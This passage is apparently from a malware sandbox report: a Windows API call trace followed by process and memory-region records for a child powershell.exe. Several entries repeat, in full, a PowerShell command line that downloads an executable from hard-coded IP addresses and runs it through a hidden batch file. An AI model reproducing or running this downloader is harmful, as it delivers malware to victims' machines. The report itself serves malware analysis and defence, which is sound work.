lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0042.935] GetEnvironmentVariableW (in: lpName="tmp", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0042.935] GetEnvironmentVariableW (in: lpName="tmp", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0042.936] _wcsicmp (_String1="powershell", _String2=")") returned 71 [0042.936] _wcsicmp (_String1="FOR", _String2="powershell") returned -10 [0042.936] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10 [0042.936] _wcsicmp (_String1="IF", _String2="powershell") returned -7 [0042.936] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7 [0042.936] _wcsicmp (_String1="REM", _String2="powershell") returned 2 [0042.936] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2 [0043.064] SetErrorMode (uMode=0x0) returned 0x8001 [0043.064] SetErrorMode (uMode=0x1) returned 0x0 [0043.064] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x24b7f0, lpFilePart=0x16f360 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x16f360*="Desktop") returned 0x19 [0043.064] SetErrorMode (uMode=0x8001) returned 0x1 [0043.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0043.065] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.070] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.072] FindClose (in: hFindFile=0x248fe0 | out: hFindFile=0x248fe0) returned 1 [0043.072] FindClose (in: hFindFile=0x248fe0 | out: hFindFile=0x248fe0) returned 1 [0043.072] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0043.072] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0043.072] GetConsoleTitleW (in: lpConsoleTitle=0x16f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.072] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f3d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f398 | out: lpAttributeList=0x16f3d8, lpSize=0x16f398) returned 1 [0043.072] UpdateProcThreadAttribute (in: lpAttributeList=0x16f3d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f388, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f3d8, lpPreviousValue=0x0) returned 1 [0043.072] GetStartupInfoW (in: lpStartupInfo=0x16f4f0 | out: lpStartupInfo=0x16f4f0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0043.072] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.074] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat; start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat' -windowstyle hidden\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x16f410*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat; start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat' -windowstyle hidden\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f3c0 | out: lpCommandLine="powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat; start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat' -windowstyle hidden\"", lpProcessInformation=0x16f3c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x9ac, dwThreadId=0x9b0)) returned 1 [0043.081] CloseHandle (hObject=0x50) returned 1 [0043.081] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0043.081] GetEnvironmentStringsW () returned 0x24bba0* [0043.082] FreeEnvironmentStringsW (penv=0x24bba0) returned 1 [0043.082] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0053.206] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16f308 | out: lpExitCode=0x16f308*=0x0) returned 1 [0053.206] CloseHandle (hObject=0x54) returned 1 [0053.206] _vsnwprintf (in: _Buffer=0x16f578, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f318 | out: _Buffer="00000000") returned 8 [0053.207] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0053.207] GetEnvironmentStringsW () returned 0x24bba0* [0053.207] FreeEnvironmentStringsW (penv=0x24bba0) returned 1 [0053.207] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0053.207] GetEnvironmentStringsW () returned 0x24bba0* [0053.207] FreeEnvironmentStringsW (penv=0x24bba0) returned 1 [0053.207] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f3d8 | out: lpAttributeList=0x16f3d8) [0053.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.207] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e8e194 | out: lpMode=0x49e8e194) returned 1 [0053.207] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.207] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e8e198 | out: lpMode=0x49e8e198) returned 1 [0053.208] SetConsoleInputExeNameW () returned 0x1 [0053.208] GetConsoleOutputCP () returned 0x1b5 [0053.208] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0053.208] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0053.208] exit (_Code=0) Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x3adb7000" os_pid = "0x9ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x994" cmd_line = "powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat; start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat' -windowstyle hidden\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 543 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 544 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 545 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 546 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 547 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 548 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 549 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 550 start_va = 0x13f7f0000 end_va = 0x13f866fff entry_point = 0x13f7f0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 551 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 552 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 553 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 554 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 555 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 556 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 557 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 558 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 559 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 560 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 561 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 562 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 563 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 564 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 565 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 566 start_va = 0x7fef3020000 end_va = 0x7fef308efff entry_point = 0x7fef3020000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 567 start_va = 0x7fefb760000 end_va = 0x7fefb778fff entry_point = 0x7fefb760000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 568 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 569 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 570 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 571 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 572 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 573 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 574 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 575 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 576 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 577 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 578 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 579 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 580 start_va = 0x1e0000 end_va = 0x1e2fff entry_point = 0x1e0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 581 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 582 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 583 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 584 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 585 start_va = 0x620000 end_va = 0x7a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 586 start_va = 0x7b0000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 587 start_va = 0x940000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 588 start_va = 0x1e40000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 589 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 590 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 591 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 592 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 593 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 594 start_va = 0x4b0000 end_va = 0x58efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 595 start_va = 0x2090000 end_va = 0x210ffff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 596 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 597 start_va = 0x590000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 598 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 599 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 600 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 601 start_va = 0x5a0000 end_va = 0x5a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 602 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 603 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 604 start_va = 0x5c0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 605 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 606 start_va = 0x2110000 end_va = 0x23defff entry_point = 0x2110000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 607 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 608 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 609 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 610 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 611 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 612 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 613 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 614 start_va = 0x5e0000 end_va = 0x5fffff entry_point = 0x5e0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 615 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 616 start_va = 0x1d80000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 617 start_va = 0x23e0000 end_va = 0x27d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 618 start_va = 0x7fefb340000 end_va = 0x7fefb396fff entry_point = 0x7fefb340000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 619 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 620 start_va = 0x7fef8e50000 end_va = 0x7fef8e83fff entry_point = 0x7fef8e50000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 642 start_va = 0x5d0000 end_va = 0x5d3fff entry_point = 0x5d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 643 start_va = 0x1d40000 end_va = 0x1d6ffff entry_point = 0x1d40000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 644 start_va = 0x1d70000 end_va = 0x1d73fff entry_point = 0x1d70000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 645 start_va = 0x1ec0000 end_va = 0x1f25fff entry_point = 0x1ec0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 646 start_va = 0x2830000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 647 start_va = 0x7fef8e40000 end_va = 0x7fef8e4bfff entry_point = 0x7fef8e40000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 648 start_va = 0x7fef9b40000 end_va = 0x7fef9bbffff entry_point = 0x7fef9b40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 649 start_va = 0x7fef9bc0000 end_va = 0x7fef9bcefff entry_point = 0x7fef9bc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 650 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 651 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 652 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 653 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 654 start_va = 0x7fefd180000 